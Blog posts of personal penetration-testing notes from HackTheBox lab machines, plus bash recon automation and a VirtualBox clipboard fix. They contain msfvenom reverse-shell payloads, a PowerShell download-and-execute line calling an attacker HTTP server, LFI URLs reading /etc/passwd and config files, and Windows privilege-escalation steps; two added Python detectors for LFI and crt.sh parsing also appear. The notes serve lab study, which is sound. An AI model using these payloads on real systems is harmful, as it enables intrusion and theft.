Wednesday, October 7, 2020

My technical record related to penetration testing, HTB, ...

 

1. Ctrl+Shift+R - reverse search: search the command history in a Linux terminal

2. tmux - a terminal multiplexer for Unix-like operating systems. It allows multiple terminal sessions to be accessed simultaneously in a single window.

 

3. nmap -sV -O -F --version-light 10.10.10.4

a. -sV: Probe open ports to determine service/version info

b. -O: Enable OS detection

c. -F: Fast mode - scan fewer ports than the default scan

d. --version-light: Limit to most likely probes (intensity 2)

e. 10.10.10.4: IP address of the Legacy box

 

4. Check for an exploit on a machine where a shell is already open (required for privilege escalation):

https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/

use post/multi/recon/local_exploit_suggester

then set session 1

This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform of the session the user has open, as well as the exploits available in Meterpreter.

 

5. Search for a file on the compromised system (from the Meterpreter session):

-> search -f user.txt

6. Create an exploit payload using msfvenom:

-> msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

-p: Payload to use

-f: Output format

-o: Save the payload to a file

LHOST: Local host

LPORT: Local port

Now upload the file (via FTP put, Meterpreter upload, or a download from a Python HTTP server).

Start listening on multi/handler and then run the uploaded exploit on the victim machine - it will create a session.

 

7. Check for an FTP service with nmap ->
-> nmap -A -p21 -v 10.10.10.5

8. Elastix login portal -> Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a web interface and includes capabilities such as call center software with predictive dialling.

 

Available exploit for Elastix 2.0 - 'graph.php' Local File Inclusion

Payload -> https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

9. SSH connect -> ssh root@10.10.10.7

10. Get details of an exploit with searchsploit -> searchsploit -x 18770.txt

11. In case the exploit uses OpenSSL (HTTPS), a proxy can be set -> set proxies http:127.0.0.1:8080

12. Default wordlist path of DirBuster -> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

13. Vtiger vulnerable version - 5.4.0 - RCE/CSRF/LFI -> searchsploit vtiger

https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

view-source:https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../../etc/asterisk/manager.conf%00
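The Elastix graph.php and vtiger sortfieldsjson.php requests above share one signature that a defender can look for in web server access logs: a ../ traversal sequence, a %00 null byte used to truncate the appended extension, and a reference to a sensitive system file. The following Python script is an added example, not part of these notes, that scans access-log lines for that signature. The log lines, IP addresses and timestamps in it are constructed, and it goes one step beyond the raw URLs above by percent-decoding repeatedly so that double-encoded variants (%252e%252e%252f) are caught as well.

```python
"""Flag path-traversal / LFI attempts in web server access logs.

Added example, not from the original notes. The log lines below are
constructed; the two request shapes mirror the Elastix graph.php and
vtiger sortfieldsjson.php LFI patterns recorded above.
"""
import re
from urllib.parse import unquote

# Apache/nginx "combined" style line: we only need the request target.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

TRAVERSAL_RE = re.compile(r'(?:\.\./|\.\.\\)')
SENSITIVE_RE = re.compile(r'/etc/(?:passwd|shadow|amportal\.conf|asterisk/)', re.I)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target: str) -> list:
    """Return the reasons a request target looks like traversal/LFI (empty list if clean)."""
    decoded = fully_decode(target)
    reasons = []
    if TRAVERSAL_RE.search(decoded):
        reasons.append("directory traversal sequence")
    if "\x00" in decoded:
        reasons.append("null byte (path truncation)")
    if SENSITIVE_RE.search(decoded):
        reasons.append("reference to sensitive system file")
    return reasons


def scan_log(lines) -> list:
    """Return (line_number, target, reasons) for each suspicious log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            hits.append((n, m.group("target"), reasons))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Oct/2020:10:01:02 +0000] "GET /vtigercrm/index.php?module=Accounts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/Oct/2020:10:01:09 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 2210 "-" "curl/7.68.0"',
    '203.0.113.5 - - [07/Oct/2020:10:02:15 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=%252e%252e%252f%252e%252e%252fetc/passwd%2500 HTTP/1.1" 200 1780 "-" "curl/7.68.0"',
    '198.51.100.9 - - [07/Oct/2020:10:03:00 +0000] "GET /static/app.js HTTP/1.1" 304 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, target, reasons in scan_log(SAMPLE_LOG):
        print(f"line {n}: {target}\n    -> {', '.join(reasons)}")
```

Running it reports lines 2 and 3 with all three reasons each; a 200 status on such a request, as in the sample, is the detail worth alerting on, since it means the inclusion most likely succeeded.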

14. nmap script to enumerate NFS exports via rpcbind -> nmap -sV --script=nfs-showmount -oN remote.nfs remote.htb

15. Mount a site backup if an unmounted backup export is available -> sudo mount -o nfsvers=4 -t nfs remote.htb:/site_backups /mnt

16. Start the Apache service -> systemctl start apache2

17. nmap - 80/tcp open  http    HttpFileServer httpd 2.3

Exploit - Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)

 

18. Set the payload for a 64-bit system -> set payload windows/x64/meterpreter/reverse_tcp

19. Privilege escalation - Windows 2012 R2 - exploit MS16-098 - 41020.exe

-> C:\Users\kostas\Desktop>41020.exe

41020.exe

Microsoft Windows [Version 6.3.9600]

(c) 2013 Microsoft Corporation. All rights reserved.

-> C:\Users\kostas\Desktop>cd C:\Administrator\Desktop

-> C:\Users\Administrator\Desktop>type root.txt

20. Command to copy data to the clipboard -> cat abc.txt | xclip

21. Run a web server on Kali on port 8000 -> python -m SimpleHTTPServer

22. Run on the victim machine to download the file -> powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/exploit.html')"

23. msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4444 -f exe > writeup.exe

24. powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.16:8000/writeup64.exe', 'writeup64.exe')"

25. With Meterpreter running, list the running processes -> ps

26. Migrate into any running process -> migrate process_ID

27. Unset a value that was set in Metasploit -> unset parameter

28. ncat -lvnp 4444 -> flags: l - listen, v - verbose, n - no DNS resolution, p - port

29. If a user-level session is obtained on the target machine and admin privileges are needed, migrate to a stable process in Windows -> 3004  580   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe

-> migrate 3004

30. An exploit in Windows 2003 R2 for admin privilege escalation -> windows/local/ms14_070_tcpip_ioctl

...

Sunday, June 21, 2020

Recon for security bugs by automation - bash script - automation tool


Run the command by automation -
Dirsearch(){
python3 ~/tools/dirsearch/dirsearch.py -u "$1" -t "$2" -e "$3"
}           # $1 = url, $2 = number of threads, $3 = extension

Bash program - for automation:
-> nano auto.sh
for domain in $(crtsh "$1"); do
# braces are required: $domain_22 would be read as an (empty) variable named domain_22
echo "$domain" | tee -a "/Desktop/Recon/${1}_22-6-2020.txt"
curl -I -s "$domain" | tee "/Path/Recon/curlout/${domain}_22-6-2020.txt"
done

Web fuzzing for critical files and directories -> nano autoWebFuzz.sh

for domain in $(crtsh "$1"); do
echo "$domain" | tee -a "/Desktop/Recon/${1}_22-6-2020.txt"
wfuzz -c -z file,/Path/Payloads/DirSrc_CritFile.txt --sc 200 "http://$domain/FUZZ" | tee "/Desktop/Recon/WebFuzzFileDirout/${domain}_22-6-2020.txt"
done

certspotter(){
curl -s "https://certspotter.com/api/v0/certs?domain=$1" | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep "$1"
} #h/t Michiel Prins

crtsh(){
curl -s "https://crt.sh/?Identity=%.$1" | grep ">*.$1" | sed 's/<[/]*[TB][DR]>/\n/g' | grep -vE "<|^[\*]*[\.]*$1" | sort -u | awk 'NF'
}

dirsearch(){ # runs dirsearch and takes host and extension as arguments
python3 /Path/tool/dirsearch/dirsearch.py -u "$1" -e "$2" -t 50 -b
}

certnmap(){ # feeds the certspotter host list straight into nmap (-iL - reads targets from stdin)
curl -s "https://certspotter.com/api/v0/certs?domain=$1" | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep "$1" | nmap -T5 -Pn -sS -iL -
}

ipinfo(){
curl "http://ipinfo.io/$1"
}

crtshdirsearch(){ # gets all domains from crt.sh, runs httprobe and then the dir bruteforcer on each live https host
curl -s "https://crt.sh/?q=%.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httprobe -c 50 | grep https | xargs -n1 -I{} python3 /Path/tool/dirsearch/dirsearch.py -u {} -e "$2" -t 50 -b
}
s3ls(){
aws s3 ls "s3://$1"
}

s3cp(){
aws s3 cp "$2" "s3://$1"
}

Make a permanent tool:

  sudo nano /bin/crtsh
  #!/bin/bash
  curl -s "https://crt.sh/?Identity=%.$1" | grep ">*.$1" | sed 's/<[/]*[TB][DR]>/\n/g' | grep -vE "<|^[\*]*[\.]*$1" | sort -u | awk 'NF'

sudo chmod +x /bin/crtsh
nano .profile    -  remove the crtsh() function from here, since the /bin/crtsh script now replaces it
source .profile
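The crtsh() and crtshdirsearch() functions above turn crt.sh output into a host list with jq, sed and sort. The following Python script is an added example, not part of the original notes, that does the same parsing on crt.sh's ?output=json payload and covers two cases those pipelines miss: one certificate's name_value field can hold several SANs separated by a newline, and a certificate matched because one SAN is under the searched domain can also carry SANs from unrelated domains, which crtshdirsearch() would pass straight to httprobe. The JSON sample and the example.com names in it are constructed.

```python
"""Parse crt.sh JSON output into a clean, in-scope hostname list.

Added example, not part of the original notes. The JSON below is a
constructed sample shaped like crt.sh's ?output=json response.
"""
import json
import re

# One DNS label per group: letters/digits, optional hyphens inside, max 63 chars.
HOSTNAME_RE = re.compile(
    r"^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)+$"
)


def in_scope(name: str, root: str) -> bool:
    """True if name is root itself or a subdomain of root (label boundary respected)."""
    return name == root or name.endswith("." + root)


def parse_crtsh(json_text: str, root: str) -> list:
    """Return sorted unique hostnames under root from a crt.sh JSON payload."""
    root = root.lower().strip(".")
    names = set()
    for entry in json.loads(json_text):
        # One cert can list several SANs; crt.sh joins them with a newline.
        for raw in entry.get("name_value", "").split("\n"):
            name = raw.strip().lower().rstrip(".")
            if name.startswith("*."):
                name = name[2:]  # wildcard -> base name, like sed 's/\*\.//g'
            if HOSTNAME_RE.match(name) and in_scope(name, root):
                names.add(name)
    return sorted(names)


# Constructed sample resembling crt.sh JSON; not a real query result.
SAMPLE_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt", "name_value": "example.com\nwww.example.com"},
    {"issuer_name": "C=US, O=Let's Encrypt", "name_value": "*.dev.example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc", "name_value": "WWW.Example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc", "name_value": "api.example.com\ncdn.other.test"},
    {"issuer_name": "C=US, O=DigiCert Inc", "name_value": "notexample.com"},
    {"issuer_name": "C=US, O=DigiCert Inc", "name_value": "mail.example.com."},
])

if __name__ == "__main__":
    for host in parse_crtsh(SAMPLE_JSON, "example.com"):
        print(host)
```

The in_scope() check is the part to keep even when the rest is done in shell: a suffix match on ".example.com" keeps cdn.other.test and notexample.com out of the host list, which a plain grep for the domain string would let through.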



Saturday, June 13, 2020

Clipboard Stopped Working in VirtualBox Kali Linux: Display Screen Size in VirtualBox:

Clipboard stopped working in VirtualBox Kali Linux:

This usually happens when the Guest Additions ISO version no longer matches the VirtualBox version or the Extension Pack version; it also tends to happen after an update/upgrade that leaves the versions mismatched.
Solution: bring all three to the same version. If updating VirtualBox to the latest version, make sure to update the Extension Pack to the same version. Next, update the Guest Additions ISO to the same version from the Devices tab -> Insert Guest Additions CD image (if it is already there, first log in to Kali and unmount/remove the attached CD image) -> then install.

Installation process -> chmod +x VBoxLinuxAdditions.run
and then -> sudo ./VBoxLinuxAdditions.run

and finally -> sudo reboot


This will solve the clipboard problem.

The Guest Additions ISO also solves the screen size issue in VirtualBox. Without it, the screen size does not work properly.